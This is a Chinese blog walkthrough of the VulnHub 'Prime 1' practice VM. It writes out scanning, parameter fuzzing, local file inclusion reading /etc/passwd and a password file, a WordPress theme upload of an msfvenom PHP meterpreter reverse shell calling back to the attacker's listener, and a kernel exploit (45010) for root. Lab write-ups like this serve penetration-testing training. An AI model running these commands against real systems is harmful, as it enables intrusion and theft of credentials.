prime_series_level-1靶场详解

已于 2024-02-26 11:42:56 修改
阅读量1.2k 收藏 25
点赞数 35
分类专栏: 内网渗透 文章标签: 网络 linux 内网渗透 提权
于 2024-02-26 11:06:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75023818/article/details/136292607
版权
本文详细描述了在虚拟环境中通过网络扫描、端口检测、目录遍历、本地文件包含漏洞利用、WordPress漏洞、MSFVenom生成反弹shell以及Ubuntu内核提权等步骤进行内网渗透的过程。
摘要由CSDN通过智能技术生成

环境搭建

官网https://www.vulnhub.com/entry/prime-1,358/

直接导入靶机

解题思路

arp-scan -l

确认靶机ip为192.168.236.136

也可以使用nmap扫网段

nmap -sn 192.168.236.0/24

使用nmap扫描靶机开放的端口

nmap -sS -T5 --min-rate 10000 192.168.236.136 -sC -p- (速度较快,内容少)我习惯性这个

nmap -A -sV -T4 -p- 192.168.236.136 内容较多,速度慢

开放了22和80端口

访问80端口,查看源码也没有任何信息

使用dirb扫描目录

当然还可以使用御剑,dirsearch等

dirb http://192.168.236.136/

访问一下http://192.168.236.136/dev和http://192.168.236.136/wordpress

访问wordpress

尝试过滤扫描dirb http://192.168.236.136 -X .txt,.php,zip

 

尝试访问这三个文件:index.php,image.php,secret.txt

提示说要找到location.txt才能进行下一步

使用wfuzz工具爆破传参数

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.136/index.php?FUZZ

发现长度宽度都一样

使用wfuzz过滤出不同的值

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.236.136/index.php?FUZZ

直接访问/index.php?file=location.txt

curl http://192.168.236.136/index.php?file=location.txt

提示显示:secrettier360是正确的参数,file只是过渡而已

尝试curl http://192.168.236.136/index.php?secrettier360=aaa

curl http://192.168.236.136/image.php?secrettier360=aaa试试

提示说找到了正确的参数

使用curl http://192.168.236.136/image.php?secrettier360=/etc/passwd读取敏感文件

后面提示说找password.txt,并且在/home/saket里面

刚才只扫到一个index.php和一个image.php所以这里只能利用image.php

使用curl http://192.168.236.136/image.php?secrettier360=/home/saket/password.txt

给了一串特殊字符follow_the_ippsec猜测是密码

尝试ssh登录:ssh -p 22 victor@192.168.236.136

ssh登录失败,尝试其他登录方式

使用前面扫描出来的wordpress登录试试

使用cmseek搜集web指纹信息

cmseek -u http://192.168.236.136/wordpress/

或者使用wpscan扫描wordpress

wpscan --url http://192.168.236.136/wordpress/ --enumerate u

显示只有一个用户victor

登录wordpress

登录成功

找后门上传点

利用msfMsfvenom命令总结大全中已有payload(php/meterpreter/reverse_tcp)生成shell.php。打开shell.php文件,将内容复制到secret.php中。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.236.128 lport=7777 -o shell.php
      -p选择相应payload
      lhost=本地IP
      lport=监听端口
      -o 指定输出文件的位置

将secret.php文件上传成功后,使用msf见天模块(exploit/multi/handler),设置lhost和lport和payload(php/meterpreter/reverse_tcp),开启监听后,浏览器打开secret.php页面。

要和生成的payload对应一致

使用msfconsole

使用监听模块 use exploit/multi/handler

跟之前生成payload的对应 set payload php/meterpreter/reverse_tcp

设置自己ip set lhost 192.168.236.128

设置端口 set lport 7777

开始监听 run和exploit都可以

让网站触发这个php反弹shell

访问这个文件

wordpress文件都在这个路径下

http://192.168.236.136/wordpress/wp-content/themes/twentynineteen/secret.php

打开msfconsole查看漏洞数据库

使用searchsploit 16.04 Ubuntu查找

发现只有这个符合,并且给了提权脚本

在msf数据漏洞库下载45010.c的提权脚本

msf脚本数据库路径/usr/share/exploitdb/exploits/linux/local

将脚本copy下来,使用gcc编译

上传45010

upload /root/45010(本机文件) /tmp/45010(靶机root目录)

发现版本报错glibc的版本不对(glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc)

两个方法,要么kali下载对应版本(主要是我kali刚刚更新) ,要么升级Ubuntu的glibc版本(本来就是渗透进去的)

我选择第三种方法,找一个以前版本的kali 2021,就可以解决了。

查看root下的root.txt文件得到flag

知识点:

1、扫描局域网内的网段主机

2、扫描端口获得运行的服务

3、扫描目录获得关键信息

4、本地文件包含漏洞LF刊

5、fuzz获得正确的参数

6、wordpress漏洞利用

7、msfvenom:生成反弹shell

8、Ubuntu内核漏洞提权

内网渗透思路框架图_内网渗透路线图-CSDN博客

苏生要努力
关注
  • 35
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
VulnHub Prime_Series_Level-1
人若无名,便可专心练剑
11-12 278
follow_the_ippsec应该就是一个密码,开始发现了开启了22端口,所以,试试ssh登录,账号用开始/etc/passwd上面的。成功读取并回显了/etc/passwd,浏览器的效果看的头晕,还是用curl看一下**,这个可以在互联网上搜索到wordpress的主题编辑页面的路径。,至于/themes前面的路径是啥,应该是wordpress主题的固定路径,也就是。提示我们,可以无密码的形式以root运行。这样应该就可以执行了,再次执行。dirb + X参数。发现,成功登录进去了。
红队靶场prime1靶机复现思路,wordpress反弹shell,shell执行ubuntu内核提权
最新发布
m0_58116751的博客
05-18 1559
OK,我们看到目录扫描完毕,我们大致扫一眼就能看到里面最敏感的我认为就是/wordpress/w-admin 我们在做渗透测试的时候需要有一定的嗅觉,结合我们之前在nmap脚本扫描中确实看到了wordpress的个平台那么这个目录90%就是他的登录界面了然后还有几个可疑目录。我们猜想是正确的,我们简单尝试几个弱口令,都失败了进不去,那没有办法,我们暂且将他搁置,我们去看下背的目录,看能不能找到一些别的信息。我们去image看下。我们看到他的默认页面是kali的图片,看一眼源码也没有发现什么可以利用的东西。
prime_series_level-1
m0_46982383的博客
07-23 771
FUZZ 、cp /bin/bash /tmp/challenge
Prime_Series_Level-1渗透流程
RemedyVI的博客
07-10 168
首先端口扫描发现22,80端口,然后目录扫描找到,访问/dev得到提示,进一步目录扫描找到secure.txt。使用wfuzz进行模糊测试,找到file参数,获取location.txt,最后得到利用文件包含获取/etc/passwd的内容然后获取wordpress的登录密码。进入后台后利用主题文件可编辑的漏洞获取反弹shell,最后利用系统漏洞提权
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1653
Vulnhub靶场Prime_Series_Level-1渗透
WXH_eprime_E-prime情绪图片刺激_eprime图片刺激_
10-01
在本案例中,“WXH_eprime_E-prime情绪图片刺激_eprime图片刺激”标题表明这是一个利用E-Prime进行情绪图片刺激实验的设计。下面将详细阐述E-Prime的基本功能、情绪图片刺激实验的设计原理及其实现方法。 E-Prime是...
ACI_Prime_Time_for_Real-Time_Report.pdf
05-18
ACI_Prime_Time_for_Real-Time_Report
20211126_ASUS_PRIME_B350-PLUS_驱动程序和工具软件.7z
11-29
01网络驱动程序-DRV_LAN_Realtek_8111x_SZ_TSD_W10_64_V...08-BIOS-PRIME-B350-PLUS-ASUS-5606.zip amd_vga_26.20.11015.1003_w1064.zip readme.txt 20211126_ASUS_PRIME_B350-PLUS_驱动程序和工具软件.7z ...
prime_factor_finder-开源
07-19
素因数是指一个大于1的自然数,除了1和它自身外,不能被其他自然数整除的数。例如,10的素因数有2和5。素因数分解就是将一个合数表示为其素因数的乘积,如30 = 2 × 3 × 5。 prime_factor_finder 程序采用了一种...
vulnhub靶场练习:Prime_Series_Level-1
qq_60256199的博客
12-30 117
vulnhub靶场练习:Prime_Series_Level-1
0x01--Prime_Series_Level-1靶场
growler67
09-16 1741
001–靶场介绍 Prime是vulnhub靶场环境的一个简单的利用靶场,我们可以在vulnhub的官网里搜索到它,Prime系列共有六个靶场,本次使用的是19年出的第一个靶场环境。 介绍及下载链接:https://www.vulnhub.com/entry/prime-1,358 002–安装 靶场下载后是一个压缩文件,解压后用vm打开就行了,默认网络连接方式是nat,开机后自动获取VM虚拟网卡的dhcp地址。 查看本地的nat网段的操作如下: 003–攻击 本次环境模拟在未知具体ip地址的环境进行渗
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1666
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
vulnhub-prime_series_level_1渗透测试
遇事不决冲冲冲
11-22 6233
环境搭建 官网https://www.vulnhub.com/entry/prime-1,358/ 将VMX文件(VMWare 文件格式详解 .VMX .VMSD .VMDK )直接拖进来 思路 扫描网站路径与敏感文件,通过不断的提示找到一个可用的fuzz工具。利用fuzzing爆破参数发现了可利用进行文件包含的参数file,这里再得到提示后,在仅有的一个php文件中利用secrettier360参数fuzzing系统敏感文件,找到一个密码后在wordpress页面进行登录,找到一个可以写入内容的页面,写
Prime 靶场渗透攻略
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
07-09 174
Prime 靶场渗透攻略
渗透测试PRIME
weixin_44727454的博客
04-07 4089
实验环境 靶机IP:192.168.172.128(通过netdiscover获取) Kali机IP:192.168.172.130 nmap(开放端口) wfuzz(模糊测试) wpscan(针对wordpress) msfvenom (生成回环连接) msfconsole(启用监听模块)
Prime_Series_Level-1
cnmeimei的博客
02-09 424
0x01 先收集靶机端口,目录信息1)nmap扫描端口开启了ssh服务和apache服务,搜索相关漏洞只有一个ssh用户名枚举,先放着2)dirb爆破目录 dirb http://192.168.0.102 发现两个可以目录/dev目录内容:意思让我们更深层次的挖掘目录信息/wordpress 可知这是一个wp博客还有管理员登陆页面,但不知道账号密码0X02 按照以上信息和提示操作1) dirb爆破dirb http://192.168.0.102 -X .txt,.html,.php 得到一个s...
Vulnhub靶机 Prime_Series_Level-1
菜浪马废的博客
04-29 836
换一个参数 secrettier360 返回结果太多 过滤一下 ??? 觉得自己被耍了 这不是saket的密码 我吐了 是victor的 我*****他的 连接成功 以为突破口是env 最后还是内核提权 我用的最后一个漏洞 先在kali上编译 gcc -o poc 45010.c 然后传到靶机上 直接运行 Vulnhub就打到这吧 主要是还要下载 太麻烦了...
is_prime(7) -> True is_prime(100) -> False is_prime(1) -> True is_prime(2) -> True的编程
04-09
解决方案: def is_prime(n): if n return False for i in range(2, int(n ** 0.5) + 1): if n % i == 0: return False return True ...注意:is_prime(1)应该返回 False,因为 1 不是质数。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值